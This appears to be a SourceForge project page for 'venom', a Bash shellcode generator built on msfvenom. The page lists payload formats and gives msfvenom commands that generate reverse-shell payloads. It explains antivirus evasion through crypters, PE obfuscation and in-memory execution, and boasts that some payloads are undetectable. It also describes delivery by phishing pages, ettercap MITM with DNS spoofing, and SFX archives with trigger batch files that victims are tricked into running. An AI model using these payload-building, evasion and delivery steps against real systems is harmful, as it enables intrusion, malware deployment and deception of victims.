Menu

Home

pedro ubuntu


venom - shellcode generator 1.0.12

Video not available
.
more video tutorials: | venom changelog: | git repository Install: | fix kali mingw32 install


.
.
.
[ MAIN MENU ]

option build target format output
1 shellcode unix C C
2 shellcode windows C DLL
3 shellcode windows DLL DLL
4 shellcode windows C PYTHON/EXE
5 shellcode windows C EXE
6 shellcode windows PSH-CMD EXE
7 shellcode windows C RUBY
8 shellcode windows MSIEXEC MSI
9 shellcode windows POWERSHELL BAT(b64)
10 shellcode windows HTA-PSH HTA(b64)
11 shellcode windows PSH-CMD PS1(b64)
12 shellcode windows PSH-CMD BAT(b64)
13 shellcode windows VBS VBS(shikata+ancii)
14 shellcode windows PSH-CMD VBS
15 shellcode windows PSH-CMD/C PDF
16 shellcode webserver PHP PHP(b64)
17 shellcode multi OS PYTHON PYTHON(b64)
18 shellcode multi OS JAVA JAR(rce)
19 web_delivery multi OS PYTHON/PSH PYTHON/BAT(b64)
20 shellcode android DALVIK APK

.
.
VENOM 1.0.12 - metasploit Shellcode generator/compiler/listener
Author: peterubuntu10@sourceforge.net [ r00t-3xp10it ]
Suspicious-Shell-Activity (SSA) RedTeam develop @2016
HomePage: http://sourceforge.net/u/peterubuntu10/profile/
Codename: black mamba [ GPL licensed ]
.
.
.

[ DEPENDENCIES ]
Zenity | Metasploit | GCC (compiler) | Pyinstaller (compiler)
mingw32 (compiler) | pyherion.py (crypter) | wine (emulator)
PEScrambler.exe (PE obfuscator) | apache2 (webserver)| winrar
vbs-obfuscator (crypter) | encrypt_PolarSSL (crypter) and
ettercap MitM+DNS_Spoof (venom domain name attack vector)

Venom.sh will download/install all dependencies as they are needed
Adicionally as build shell/aux/setup.sh to help you install all venom
tool dependencies (metasploit as to be manually installed)
.
.
[ HOW DOES VENOM.SH WORKS ? ]
This script will use msfvenom (metasploit) to generate shellcode in
diferent formats ( c | python | ruby | dll | msi | hta | psh | vbs | php | java)
then injects the shellcode generated into one template previous writen
by me (example: python) "the python funtion will execute the shellcode
into RAM" also uses compilers like gcc (gnu cross compiler) or mingw32
or pyinstaller to build the stand-alone executable file, it also starts a
multi-handler to recive the remote connection (shell or meterpreter)
.
'venom generator' tool reproduces some of the technics used
by Veil-Evasion.py, unicorn.py, powersploit.py, etc, etc, etc..
"P.S. some payloads are undetectable by AV soluctions... yes!!!"
One of the reasons for that its the use of a funtion to execute
the 2º stage of shell/meterpreter directly into targets ram
the other reazon its the use of external obfuscators/crypters.
.
But venom its not a fork of any of this tools because its writen
using Bash contrary to those tools that uses Python, so i can not
copy any funtion writen from any of this tools and past it on my
bash script (obviously), also remmenbering that veil does not
build: [.msi .hta .vbs .ps1 .dll .php .jar ] payload formats...
.
Remmenber also that software like: pycrypto, pyinstaller, pywin
gcc, mingw32, hiperion, Py2exe, PEScrambler, was not written by
any of the veil developers, i just did the same that veil porting
this softwares to my project to be hable to compile obfuscate
or crypt the shellcode generated by msfvenom...
.
.

[ HOW DO I DELIVER MY PAYLOADS TO TARGET HOST ? ]
venom 1.0.11 (malicious_server) was build to take advantage of
apache2 webserver to deliver payloads (lan) using a fake webpage
writen in html that takes advantage of <iframe> <meta-http-equiv><br> or tags to be hable to trigger payload download. Venom also<br> gives you the ability to deliver your payloads in 2 diferent ways:<br> .<br> 1º - run shell/aux/setup.sh to config venom domain name<br> attack vector (http://mega-upload.com) thats going to use<br> ettercap (mitm+dns_spoof method) to redirect target traffic<br> to our phishing webpage (IPv&lt;4/6&gt; configuration required)<br> .<br> 2º - use shell/aux/setup.sh to delete venom domain name<br> attack vector and force venom.sh main tool to use default<br> settings (http://<your-ip-adrr>) to deliver payloads using<br> 'social engeneering' technic (send malicious URL to target)<br> .<br> .<br> <strong><a class="alink notfound" href="%20WHAT%20ARE%20THE%20FILES%20INSIDE%20TEMPLATES%20FOLDER%20%3F%20">[ WHAT ARE THE FILES INSIDE TEMPLATES FOLDER ? ]</a></strong><br> The shellcode generated can not be executed by its own...<br> It requires to be embedded into one template (example: batch)<br> to be executed, So the files inside '/shell/templates' are<br> templates previous writen by me using diferent languages like<br> (C, batch, ruby, powershell, python, php, vbscript) to trigger<br> the execution of shellcode directly into targets RAM.<br> .<br> .<br> <strong><a class="alink notfound" href="%20WHAT%20ARE%20THE%20FILES%20TRIGGER.BAT%20FOR%20%3F%20">[ WHAT ARE THE FILES TRIGGER.BAT FOR ? ]</a></strong><br> In some modules venom will build the payload and trigger.bat<br> to 'trigger' the execution of payload when embedded into one<br> winrar/SFX executable file "upon extraction". Venom gives you<br> the ability to 'trigger' your payloads in 3 diferent ways:<br> .<br> 1º - paste the command provided by venom into target cmd<br> 2º - copy bouth files (payload and trigger.bat) to target<br> into the same directory and press twice in trigger.bat<br> 3º - compress bouth files into one WinRar/sfx file<br> send it to target, and press twice to execute it.<br> .<br> .<br> <strong><a class="alink notfound" href="%20BUILDING%20SHELLCODE%20USING%20MSFVENOM%20DOES%20NOT%20FLAG%20AV%20DETECTIONS%20%3F%20">[ BUILDING SHELLCODE USING MSFVENOM DOES NOT FLAG AV DETECTIONS ? ]</a></strong><br> Let's take Veil-Evasion python payload (crypted) as example:<br> 1º - veil uses msfvenom to build shellcode in C format<br> 2º - then it embedded the shellcode source code into one template<br> writen in pyhton language (the funtion will execute shellcode)<br> 3º - uses 'pyherion.py' to encrypt the source code with one random<br> AES key + base64 (all together = FUD) "My 'python/exe -&gt; pyherion'<br> module reproduces the same technic, by using the same crypter ;)"<br> .<br> So it depends of the crypters/obfuscators used to scramble the<br> sourcecode and also the ability to execute the 2º stage of shell<br> or meterpreter stager directly into targets ram (not touching disk)<br> Another example is maligno tool that deliver payloads under https<br> (SSL/TLS encrypted comunications) evading better AV detections.<br> 'There are more technics, but they are not reproduced by venom'</p> <p>.<br> .<br> <strong><a class="alink notfound" href="%20HOW%20DOES%20MSFVENOM%20ACTUALLY%20BUILDS%20SHELLCODE%20%3F%20">[ HOW DOES MSFVENOM ACTUALLY BUILDS SHELLCODE ? ]</a></strong><br> The default way to generate a windows binary payload (.exe)<br> using msfvenom is achieved through the -f switch (format) and -o (output name)</p> <div class="codehilite"><pre><span></span><code><span class="n">msfvenom</span> <span class="o">-</span><span class="n">p</span> <span class="n">payload</span><span class="o">-</span><span class="n">name</span> <span class="n">LHOST</span><span class="o">=</span><span class="mf">127.0</span><span class="o">.</span><span class="mf">0.1</span> <span class="n">LPORT</span><span class="o">=</span><span class="mi">666</span> <span class="o">-</span><span class="n">f</span> <span class="n">exe</span> <span class="o">-</span><span class="n">o</span> <span class="n">payload</span><span class="o">.</span><span class="n">exe</span> </code></pre></div> <p>But msfvenom allow us to build shellcode in diferent formats<br> like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh<br> macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c<br> java, perl, powershell, python, ruby, sh, vbscript.<br> The complete list can be accessed using the follow command:</p> <div class="codehilite"><pre><span></span><code>sudo msfvenom --help-formats </code></pre></div> <p>now lets generate a simple shellcode to windows/shell/reverse_tcp<br> chosing powershell as output format "note that we will not use<br> the flag -o (Save the payload) option, this way the shellcode<br> generated will only displays in current terminal windows". </p> <div class="codehilite"><pre><span></span><code>Using powershell as output format: msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell Using java as output format: msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java Using hex as output format: msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex </code></pre></div> <p>.<br> .<br> .<br> <strong><a class="alink notfound" href="%20WHY%20PYINSTALLER%20DOES%20NOT%20WORK%20UNDER%20MY%20DISTRO%20%3F%20">[ WHY PYINSTALLER DOES NOT WORK UNDER MY DISTRO ? ]</a></strong><br> pyinstaller needs certain dependencies to be installed<br> under wine, sutch as: python-2.6.6 and pywin32 to work.<br> the problem is that the dependencies needed must be<br> based into attackers machine arch and chiptech brand<br> (x86 | x64 | AMD | INTEL), for manually install it<br> just unpack 'shell/obfuscate/pyinstaller-2.0.tar.gz'<br> and follow the instructions inside readme-pedr0.txt<br> pyinstaller command used by this script:</p> <div class="codehilite"><pre><span></span><code>su &lt;user_name&gt; -c &#39;pyinstaller --noconsole --onefile &lt;spec_file&gt;&#39; </code></pre></div> <p>.<br> .<br> <strong><a class="alink notfound" href="%20HOW%20CAN%20I%20USE%20PESCRAMBLER.EXE%20%3F%20">[ HOW CAN I USE PESCRAMBLER.EXE ? ]</a></strong><br> PEScrambler.exe is a windows binary executable file<br> and like pyinstaller does not run under 'root user acc'<br> if you wish to use it then open an terminal(normal user)<br> and issue the follow command on it:</p> <div class="codehilite"><pre><span></span><code>su &lt;user_name&gt; -c &#39;wine pescrambler.exe -i &lt;Infile.exe&gt; -o &lt;outfile.exe&gt;&#39; </code></pre></div> <p>(pescrambler.exe does not compile payloads to .exe format<br> it will take an executable.exe and obfuscate the sourcecode<br> to better evade AV detection rate (not very effective now)<br> .<br> .<br> .<br> <strong><a class="alink notfound" href="%20DESCRIPTION%20OF%20NATIVE%20CRYPTERS/COMPILERS%20">[ DESCRIPTION OF NATIVE CRYPTERS/COMPILERS ]</a></strong><br> pyherion.py = Python 'crypter' that builds an dynamic AES/base64<br> encoded launcher (with a random key) that's decoded/decrypted<br> in memory (RAM) and then executed, 'evading AV detection'.</p> <div class="codehilite"><pre><span></span><code>python pyherion.py &lt;file-to-crypt.py&gt; &lt;outfile.py&gt; </code></pre></div> <p>PEScrambler.exe = crypter to obfuscate an existing .exe</p> <div class="codehilite"><pre><span></span><code>su &lt;user_name&gt; -c &#39;wine pescrambler.exe -i &lt;Infile.exe&gt; -o &lt;outfile.exe&gt;&#39; </code></pre></div> <p>pyinstaller.py = compile an existing python file into one .exe</p> <div class="codehilite"><pre><span></span><code>su &lt;user_name&gt; -c &#39;pyinstaller --noconsole --onefile &lt;file-to-be-compiled.py&gt;&#39; </code></pre></div> <p>gcc = gnu cross compiler to build unix executable files</p> <div class="codehilite"><pre><span></span><code>gcc -fno-stack-protector -z execstack &lt;template.c&gt; -o &lt;outfile&gt; </code></pre></div> <p>mingw32 = cross compiler to build .exe executable files</p> <div class="codehilite"><pre><span></span><code>i586-mingw32msvc-gcc &lt;template.c&gt; -o &lt;outfile.exe&gt; -mwindows </code></pre></div> <p>encrypt_solarSSL = encrypt your payloads in base64+AES ramdom key..</p> <div class="codehilite"><pre><span></span><code> <span class="n">python</span> <span class="n">encrypt_payload_polar</span><span class="o">.</span><span class="n">py</span> <span class="o">&lt;</span><span class="n">password</span> <span class="n">to</span> <span class="n">generate</span> <span class="n">AES</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="n">infile</span><span class="o">&gt;</span> </code></pre></div> <p>vbs-obfuscator = encrypt your payload.vbs using ascii (only vbs payloads)</p> <div class="codehilite"><pre><span></span><code> python vbs-obfuscator.py &lt;inFile.vbs&gt; &lt;outFile.vbs&gt; </code></pre></div> <p>.<br> .<br> .<br> <center><strong><a class="alink notfound" href="%20SPECIAL%20THANKS/CREDITS%20TO%20">[ SPECIAL THANKS/CREDITS TO ]</a>:</strong></center></p> <hr> <p>HD Moore (metasploit father) | Nick Harbour (PEScrambler.exe)<br> @harmj0y (pyherion) | @G0tmi1k <a class="user-mention" href="/u/chris/">@chris</a> truncker @harmj0y (ruby_stager)<br> David Cortesi (pyinstaller) | astr0baby (reflective fud dll injection method)<br> 0entropy (powershell poc's) | Matthew Graeber (powershell poc's)<br> alor&amp;naga (ettercap) | Liviu (encrypt_polarSSL) | Chaitanya (debugging)<br> Suriya Prakash (debugging/recording tutorials)| and offcourse me (r00t-3xp10it) ^_^</p> <hr> <p><center><br> Copyright © 2016 - venom shellcode generator<br> </center></p></iframe>


Discussion

Anonymous
Anonymous

Add attachments
Cancel





Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.